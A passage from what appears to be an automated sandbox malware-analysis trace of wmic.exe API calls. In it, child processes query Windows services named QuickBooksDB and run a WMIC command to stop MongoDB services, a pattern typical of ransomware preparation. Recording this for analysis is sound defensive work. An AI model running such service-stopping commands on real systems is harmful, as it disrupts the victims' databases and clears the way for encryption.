pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="Delete", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c4a0) returned 0x0 [0256.378] lstrlenW (lpString="Delete") returned 6 [0256.378] lstrlenW (lpString="stopservice") returned 11 [0256.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0256.378] IUnknown:Release (This=0x1c6c4a0) returned 0x0 [0256.378] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="GetSecurityDescriptor", ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x1c6c640) returned 0x0 [0256.378] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0256.378] lstrlenW (lpString="stopservice") returned 11 [0256.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0256.378] IUnknown:Release (This=0x1c6c640) returned 0x0 [0256.378] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*="SetSecurityDescriptor", ppInSignature=0x18d340*=0x1c6c520, ppOutSignature=0x18d348*=0x1c6ca20) returned 0x0 [0256.378] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0256.378] lstrlenW (lpString="stopservice") returned 11 [0256.378] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0256.379] IUnknown:Release (This=0x1c6c520) returned 0x0 [0256.379] IUnknown:Release (This=0x1c6ca20) returned 0x0 [0256.379] IWbemClassObject:NextMethod (in: This=0x1c6bfa0, lFlags=0, pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0 | out: pstrName=0x18d338*=0x0, ppInSignature=0x18d340*=0x0, ppOutSignature=0x18d348*=0x0) returned 0x40005 [0256.379] IUnknown:Release (This=0x1c6bfa0) returned 0x0 [0256.379] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.379] lstrlenW (lpString="SET") returned 3 [0256.379] lstrlenW (lpString="call") returned 4 [0256.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0256.379] lstrlenW (lpString="CREATE") returned 6 [0256.379] lstrlenW (lpString="call") returned 4 [0256.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0256.379] free (_Block=0x2b8600) [0256.379] malloc (_Size=0x8) returned 0x2bcff0 [0256.379] lstrlenW (lpString="GET") returned 3 [0256.379] lstrlenW (lpString="call") returned 4 [0256.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0256.379] lstrlenW (lpString="LIST") returned 4 [0256.379] lstrlenW (lpString="call") returned 4 [0256.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0256.379] lstrlenW (lpString="ASSOC") returned 5 [0256.379] lstrlenW (lpString="call") returned 4 [0256.379] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0256.379] WbemLocator:IUnknown:AddRef (This=0x1c31390) returned 0x3 [0256.379] free (_Block=0x2b6a90) [0256.379] lstrlenW (lpString="") returned 0 [0256.379] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0256.380] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.380] malloc (_Size=0x14) returned 0x2bcc40 [0256.380] lstrlenW (lpString="XDUWTFONO") returned 9 [0256.380] GetCurrentThreadId () returned 0xa48 [0256.380] GetCurrentProcess () returned 0xffffffffffffffff [0256.380] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18f680 | out: TokenHandle=0x18f680*=0x298) returned 1 [0256.380] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f678 | out: TokenInformation=0x0, ReturnLength=0x18f678) returned 0 [0256.380] malloc (_Size=0x118) returned 0x2bd0b0 [0256.380] GetTokenInformation (in: TokenHandle=0x298, TokenInformationClass=0x3, TokenInformation=0x2bd0b0, TokenInformationLength=0x118, ReturnLength=0x18f678 | out: TokenInformation=0x2bd0b0, ReturnLength=0x18f678) returned 1 [0256.380] AdjustTokenPrivileges (in: TokenHandle=0x298, DisableAllPrivileges=0, NewState=0x2bd0b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=914186663, Attributes=0x1d2a), (Luid.LowPart=0x0, Luid.HighPart=2846720, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=33554434, Attributes=0x1d3d), (Luid.LowPart=0x0, Luid.HighPart=2818392, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x10001d37))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0256.380] free (_Block=0x2bd0b0) [0256.380] CloseHandle (hObject=0x298) returned 1 [0256.380] lstrlenW (lpString="GET") returned 3 [0256.380] lstrlenW (lpString="call") returned 4 [0256.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0256.380] lstrlenW (lpString="LIST") returned 4 [0256.380] lstrlenW (lpString="call") returned 4 [0256.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0256.380] lstrlenW (lpString="SET") returned 3 [0256.380] lstrlenW (lpString="call") returned 4 [0256.380] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0256.380] lstrlenW (lpString="CALL") returned 4 [0256.381] lstrlenW (lpString="call") returned 4 [0256.381] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0256.381] ??0CHString@@QEAA@XZ () returned 0x18f630 [0256.381] GetCurrentThreadId () returned 0xa48 [0256.381] malloc (_Size=0x18) returned 0x2bcc60 [0256.381] malloc (_Size=0x18) returned 0x2bcc80 [0256.381] malloc (_Size=0x18) returned 0x2bcca0 [0256.381] malloc (_Size=0x18) returned 0x2bccc0 [0256.381] malloc (_Size=0x18) returned 0x2bcce0 [0256.381] SysStringLen (param_1="\\\\") returned 0x2 [0256.381] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0256.381] malloc (_Size=0x18) returned 0x2bcd00 [0256.381] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0256.381] SysStringLen (param_1="\\") returned 0x1 [0256.381] malloc (_Size=0x18) returned 0x2bd6a0 [0256.381] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0256.381] SysStringLen (param_1="root\\cimv2") returned 0xa [0256.382] free (_Block=0x2bcd00) [0256.382] free (_Block=0x2bcce0) [0256.382] free (_Block=0x2bccc0) [0256.382] free (_Block=0x2bcca0) [0256.382] free (_Block=0x2bcc80) [0256.382] free (_Block=0x2bcc60) [0256.382] malloc (_Size=0x18) returned 0x2bcc60 [0256.382] malloc (_Size=0x18) returned 0x2bcc80 [0256.382] malloc (_Size=0x18) returned 0x2bcca0 [0256.382] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1c31390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffcc29d0 | out: ppNamespace=0xffcc29d0*=0x1c43b28) returned 0x0 [0256.386] free (_Block=0x2bcca0) [0256.386] free (_Block=0x2bcc80) [0256.386] free (_Block=0x2bcc60) [0256.386] CoSetProxyBlanket (pProxy=0x1c43b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0256.386] free (_Block=0x2bd6a0) [0256.386] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.386] ??0CHString@@QEAA@XZ () returned 0x18f3d8 [0256.386] GetCurrentThreadId () returned 0xa48 [0256.386] malloc (_Size=0x70) returned 0x2bd0b0 [0256.387] malloc (_Size=0x50) returned 0x2bd130 [0256.387] malloc (_Size=0x50) returned 0x2bd190 [0256.387] malloc (_Size=0x70) returned 0x2bd1f0 [0256.387] malloc (_Size=0x70) returned 0x2bd270 [0256.387] malloc (_Size=0x48) returned 0x2bd2f0 [0256.387] malloc (_Size=0x18) returned 0x2bcc60 [0256.387] lstrlenA (lpString="") returned 0 [0256.387] malloc (_Size=0x2) returned 0x2b6a90 [0256.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc5314c, cbMultiByte=-1, lpWideCharStr=0x2b6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0256.387] free (_Block=0x2b6a90) [0256.387] malloc (_Size=0x70) returned 0x2bd340 [0256.387] malloc (_Size=0x48) returned 0x2bd3c0 [0256.387] malloc (_Size=0x18) returned 0x2bcc80 [0256.387] free (_Block=0x2bcc60) [0256.387] IWbemServices:GetObject (in: This=0x1c43b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x18f408*=0x0, ppCallResult=0x0 | out: ppObject=0x18f408*=0x1c6c030, ppCallResult=0x0) returned 0x0 [0256.403] malloc (_Size=0x18) returned 0x2bcc60 [0256.403] IWbemClassObject:GetMethod (in: This=0x1c6c030, wszName="stopservice", lFlags=0, ppInSignature=0x18f400, ppOutSignature=0x18f418 | out: ppInSignature=0x18f400*=0x0, ppOutSignature=0x18f418*=0x1c6c530) returned 0x0 [0256.403] free (_Block=0x2bcc60) [0256.403] IUnknown:Release (This=0x1c6c530) returned 0x0 [0256.403] IUnknown:Release (This=0x1c6c030) returned 0x0 [0256.403] ??0CHString@@QEAA@XZ () returned 0x18f220 [0256.403] GetCurrentThreadId () returned 0xa48 [0256.403] malloc (_Size=0x18) returned 0x2bcc60 [0256.403] lstrlenA (lpString="") returned 0 [0256.403] malloc (_Size=0x2) returned 0x2b6a90 [0256.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc5314c, cbMultiByte=-1, lpWideCharStr=0x2b6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0256.403] free (_Block=0x2b6a90) [0256.403] malloc (_Size=0x18) returned 0x2bcca0 [0256.403] lstrlenA (lpString="") returned 0 [0256.403] malloc (_Size=0x2) returned 0x2b6a90 [0256.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc5314c, cbMultiByte=-1, lpWideCharStr=0x2b6a90, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0256.403] free (_Block=0x2b6a90) [0256.403] malloc (_Size=0x18) returned 0x2bccc0 [0256.403] free (_Block=0x2bcca0) [0256.404] malloc (_Size=0x18) returned 0x2bcca0 [0256.404] lstrlenA (lpString="SELECT * FROM ") returned 14 [0256.404] malloc (_Size=0x1e) returned 0x2bd410 [0256.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc54a40, cbMultiByte=-1, lpWideCharStr=0x2bd410, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0256.404] free (_Block=0x2bd410) [0256.404] malloc (_Size=0x18) returned 0x2bcce0 [0256.404] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0256.404] SysStringLen (param_1="Win32_Service") returned 0xd [0256.404] free (_Block=0x2bcca0) [0256.404] malloc (_Size=0x18) returned 0x2bcca0 [0256.404] malloc (_Size=0x18) returned 0x2bcd00 [0256.404] lstrlenA (lpString=" WHERE ") returned 7 [0256.404] malloc (_Size=0x10) returned 0x2bd6a0 [0256.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc53e20, cbMultiByte=-1, lpWideCharStr=0x2bd6a0, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0256.404] free (_Block=0x2bd6a0) [0256.404] malloc (_Size=0x18) returned 0x2bd6a0 [0256.404] SysStringLen (param_1=" WHERE ") returned 0x7 [0256.404] SysStringLen (param_1="name like '%%QuickBooksDB%%'") returned 0x1c [0256.404] malloc (_Size=0x18) returned 0x2bd6c0 [0256.404] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0256.405] SysStringLen (param_1=" WHERE name like '%%QuickBooksDB%%'") returned 0x23 [0256.405] free (_Block=0x2bcce0) [0256.405] free (_Block=0x2bd6a0) [0256.405] free (_Block=0x2bcd00) [0256.405] free (_Block=0x2bcca0) [0256.405] malloc (_Size=0x18) returned 0x2bcca0 [0256.405] IWbemServices:ExecQuery (in: This=0x1c43b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%QuickBooksDB%%'", lFlags=48, pCtx=0x0, ppEnum=0x18f208 | out: ppEnum=0x18f208*=0x1c43c28) returned 0x0 [0256.408] free (_Block=0x2bcca0) [0256.408] CoSetProxyBlanket (pProxy=0x1c43c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0256.411] IEnumWbemClassObject:Next (in: This=0x1c43c28, lTimeout=-1, uCount=0x1, apObjects=0x18f210, puReturned=0x18f398 | out: apObjects=0x18f210*=0x0, puReturned=0x18f398*=0x0) returned 0x1 [0256.767] IUnknown:Release (This=0x1c43c28) returned 0x0 [0256.768] free (_Block=0x2bd6c0) [0256.768] free (_Block=0x2bccc0) [0256.768] free (_Block=0x2bcc60) [0256.768] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.768] free (_Block=0x2bcc80) [0256.768] free (_Block=0x2bd2f0) [0256.768] free (_Block=0x2bd270) [0256.768] free (_Block=0x2bd1f0) [0256.768] free (_Block=0x2bd190) [0256.768] free (_Block=0x2bd130) [0256.768] free (_Block=0x2bd3c0) [0256.768] free (_Block=0x2bd340) [0256.768] free (_Block=0x2bd0b0) [0256.768] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.768] GetCurrentThreadId () returned 0xa48 [0256.768] ??0CHString@@QEAA@PEBG@Z () returned 0x18f728 [0256.768] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x18f728 [0256.769] malloc (_Size=0x800) returned 0x2bde70 [0256.769] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2bde70, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0256.769] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0256.769] malloc (_Size=0x1c) returned 0x2bd0b0 [0256.769] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2bd0b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0256.769] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0256.769] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0256.769] free (_Block=0x2bd0b0) [0256.769] free (_Block=0x2bde70) [0256.769] ??1CHString@@QEAA@XZ () returned 0x197d6101 [0256.769] WbemLocator:IUnknown:Release (This=0x1c43b28) returned 0x0 [0256.770] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0256.770] _kbhit () returned 0x0 [0256.771] free (_Block=0x2bcff0) [0256.771] free (_Block=0x2bcac0) [0256.771] free (_Block=0x2bcaa0) [0256.771] free (_Block=0x2bca80) [0256.771] free (_Block=0x2bca60) [0256.771] free (_Block=0x2bce20) [0256.771] free (_Block=0x2bcfc0) [0256.771] free (_Block=0x2bcf60) [0256.771] free (_Block=0x2bd060) [0256.771] free (_Block=0x2bcb60) [0256.771] free (_Block=0x2bcb80) [0256.772] free (_Block=0x2b6ee0) [0256.772] free (_Block=0x2bd620) [0256.772] free (_Block=0x2bcba0) [0256.772] free (_Block=0x2bcc00) [0256.772] free (_Block=0x2bd5a0) [0256.772] free (_Block=0x2bd520) [0256.772] free (_Block=0x2bcbe0) [0256.772] free (_Block=0x2bcbc0) [0256.772] free (_Block=0x2bcc20) [0256.772] free (_Block=0x2bd4c0) [0256.772] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0256.772] free (_Block=0x2bcec0) [0256.772] free (_Block=0x2bcb00) [0256.772] free (_Block=0x2bcf90) [0256.772] free (_Block=0x2bcb40) [0256.772] free (_Block=0x2bd010) [0256.772] free (_Block=0x2bcb20) [0256.772] free (_Block=0x2bcae0) [0256.772] free (_Block=0x2b69a0) [0256.772] free (_Block=0x2b69f0) [0256.772] free (_Block=0x2b6a40) [0256.772] free (_Block=0x2bcc40) [0256.773] free (_Block=0x2b6b00) [0256.773] free (_Block=0x2b6ec0) [0256.773] free (_Block=0x2b8040) [0256.773] free (_Block=0x2b6ea0) [0256.773] free (_Block=0x2b8000) [0256.773] free (_Block=0x2b6e40) [0256.773] free (_Block=0x2b6e60) [0256.773] free (_Block=0x2b6d20) [0256.773] free (_Block=0x2b6d40) [0256.773] free (_Block=0x2b6cc0) [0256.773] free (_Block=0x2b6ce0) [0256.773] free (_Block=0x2b6d80) [0256.773] free (_Block=0x2b6da0) [0256.773] free (_Block=0x2b6de0) [0256.773] free (_Block=0x2b6e00) [0256.773] free (_Block=0x2b6c00) [0256.773] free (_Block=0x2b6c20) [0256.773] free (_Block=0x2b6ba0) [0256.773] free (_Block=0x2b6bc0) [0256.773] free (_Block=0x2b6c60) [0256.774] free (_Block=0x2b6c80) [0256.774] free (_Block=0x2b6b40) [0256.774] free (_Block=0x2b6b60) [0256.774] free (_Block=0x2b6ab0) [0256.774] free (_Block=0x2b7f90) [0256.774] free (_Block=0x2b6f70) [0256.774] WbemLocator:IUnknown:Release (This=0x1c31390) returned 0x2 [0256.774] WbemLocator:IUnknown:Release (This=0x1c43a98) returned 0x0 [0256.774] WbemLocator:IUnknown:Release (This=0x1c31390) returned 0x1 [0256.774] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0256.774] WbemLocator:IUnknown:Release (This=0x1c31390) returned 0x0 [0256.774] free (_Block=0x2bc9e0) [0256.774] free (_Block=0x2bca00) [0256.774] free (_Block=0x2b8540) [0256.774] free (_Block=0x2bca20) [0256.774] free (_Block=0x2bca40) [0256.775] free (_Block=0x2b8580) [0256.775] free (_Block=0x2bc860) [0256.775] free (_Block=0x2bc880) [0256.775] free (_Block=0x2b83c0) [0256.775] free (_Block=0x2bc8a0) [0256.775] free (_Block=0x2bc8c0) [0256.775] free (_Block=0x2b8400) [0256.775] free (_Block=0x2bc7e0) [0256.775] free (_Block=0x2bc800) [0256.775] free (_Block=0x2b8340) [0256.775] free (_Block=0x2bc820) [0256.775] free (_Block=0x2bc840) [0256.775] free (_Block=0x2b8380) [0256.775] free (_Block=0x2bc960) [0256.775] free (_Block=0x2bc980) [0256.775] free (_Block=0x2b84c0) [0256.775] free (_Block=0x2bc9a0) [0256.775] free (_Block=0x2bc9c0) [0256.775] free (_Block=0x2b8500) [0256.776] free (_Block=0x2bc760) [0256.776] free (_Block=0x2bc780) [0256.776] free (_Block=0x2b82c0) [0256.776] free (_Block=0x2bc7a0) [0256.776] free (_Block=0x2bc7c0) [0256.776] free (_Block=0x2b8300) [0256.776] free (_Block=0x2bc8e0) [0256.776] free (_Block=0x2bc900) [0256.776] free (_Block=0x2b8440) [0256.776] free (_Block=0x2bc920) [0256.776] free (_Block=0x2bc940) [0256.776] free (_Block=0x2b8480) [0256.776] free (_Block=0x2bc6a0) [0256.776] free (_Block=0x2bc6c0) [0256.776] free (_Block=0x2b8200) [0256.776] free (_Block=0x2bc560) [0256.776] free (_Block=0x2bc580) [0256.776] free (_Block=0x2b80c0) [0256.777] free (_Block=0x2b6f30) [0256.777] free (_Block=0x2b6f50) [0256.777] free (_Block=0x2b8080) [0256.777] free (_Block=0x2bc5e0) [0256.777] free (_Block=0x2bc600) [0256.777] free (_Block=0x2b8140) [0256.777] free (_Block=0x2bc6e0) [0256.777] free (_Block=0x2bc700) [0256.777] free (_Block=0x2b8240) [0256.777] free (_Block=0x2bc5a0) [0256.777] free (_Block=0x2bc5c0) [0256.777] free (_Block=0x2b8100) [0256.777] free (_Block=0x2bc620) [0256.777] free (_Block=0x2bc640) [0256.777] free (_Block=0x2b8180) [0256.777] free (_Block=0x2bc660) [0256.777] free (_Block=0x2bc680) [0256.777] free (_Block=0x2b81c0) [0256.777] free (_Block=0x2bc720) [0256.778] free (_Block=0x2bc740) [0256.778] free (_Block=0x2b8280) [0256.778] CoUninitialize () [0256.817] exit (_Code=0) [0256.817] free (_Block=0x2bcd30) [0256.817] free (_Block=0x2b7f50) [0256.817] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.818] free (_Block=0x2b7020) [0256.818] free (_Block=0x2b6b20) [0256.818] free (_Block=0x2b7f10) [0256.818] free (_Block=0x2b7ed0) [0256.818] free (_Block=0x2b7e80) [0256.818] free (_Block=0x2b7e40) [0256.818] free (_Block=0x2b5ac0) [0256.818] free (_Block=0x2b7dc0) [0256.818] free (_Block=0x2b5a80) [0256.818] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0256.818] free (_Block=0x2b85c0) Thread: id = 232 os_tid = 0x36c Thread: id = 233 os_tid = 0x920 Thread: id = 234 os_tid = 0x5d0 Thread: id = 235 os_tid = 0x10c Thread: id = 236 os_tid = 0x49c Process: id = "29" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x7044f000" os_pid = "0x528" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MongoDB%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 238 os_tid = 0x730 [0257.016] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef8f0 | out: lpSystemTimeAsFileTime=0xef8f0*(dwLowDateTime=0xae8cde70, dwHighDateTime=0x1d61d49)) [0257.016] GetCurrentProcessId () returned 0x528 [0257.016] GetCurrentThreadId () returned 0x730 [0257.016] GetTickCount () returned 0x1169d49 [0257.016] QueryPerformanceCounter (in: lpPerformanceCount=0xef8f8 | out: lpPerformanceCount=0xef8f8*=37718947904) returned 1 [0257.020] GetModuleHandleW (lpModuleName=0x0) returned 0xffc00000 [0257.020] __set_app_type (_Type=0x1) [0257.020] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc4ced0) returned 0x0 [0257.021] __wgetmainargs (in: _Argc=0xffc72380, _Argv=0xffc72390, _Env=0xffc72388, _DoWildCard=0, _StartInfo=0xffc7239c | out: _Argc=0xffc72380, _Argv=0xffc72390, _Env=0xffc72388) returned 0 [0257.021] ??0CHString@@QEAA@XZ () returned 0xffc72ab0 [0257.021] malloc (_Size=0x30) returned 0x355a80 [0257.022] malloc (_Size=0x70) returned 0x357da0 [0257.022] malloc (_Size=0x50) returned 0x355ac0 [0257.022] malloc (_Size=0x30) returned 0x357e20 [0257.022] malloc (_Size=0x48) returned 0x357e60 [0257.022] malloc (_Size=0x30) returned 0x357eb0 [0257.022] malloc (_Size=0x30) returned 0x357ef0 [0257.022] ??0CHString@@QEAA@XZ () returned 0xffc72f58 [0257.022] malloc (_Size=0x30) returned 0x357f30 [0257.022] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0257.022] SetConsoleCtrlHandler (HandlerRoutine=0xffc45724, Add=1) returned 1 [0257.022] _onexit (_Func=0xffc5f378) returned 0xffc5f378 [0257.022] _onexit (_Func=0xffc5f490) returned 0xffc5f490 [0257.022] _onexit (_Func=0xffc5f4d0) returned 0xffc5f4d0 [0257.023] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0257.023] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0257.028] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0257.041] CoCreateInstance (in: rclsid=0xffc073a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc07370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffc72940 | out: ppv=0xffc72940*=0x1ca1390) returned 0x0 [0257.052] GetCurrentProcess () returned 0xffffffffffffffff [0257.052] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xef6c0 | out: TokenHandle=0xef6c0*=0xf4) returned 1 [0257.052] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xef6b8 | out: TokenInformation=0x0, ReturnLength=0xef6b8) returned 0 [0257.052] malloc (_Size=0x118) returned 0x356980 [0257.052] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x356980, TokenInformationLength=0x118, ReturnLength=0xef6b8 | out: TokenInformation=0x356980, ReturnLength=0xef6b8) returned 1 [0257.052] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x356980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), 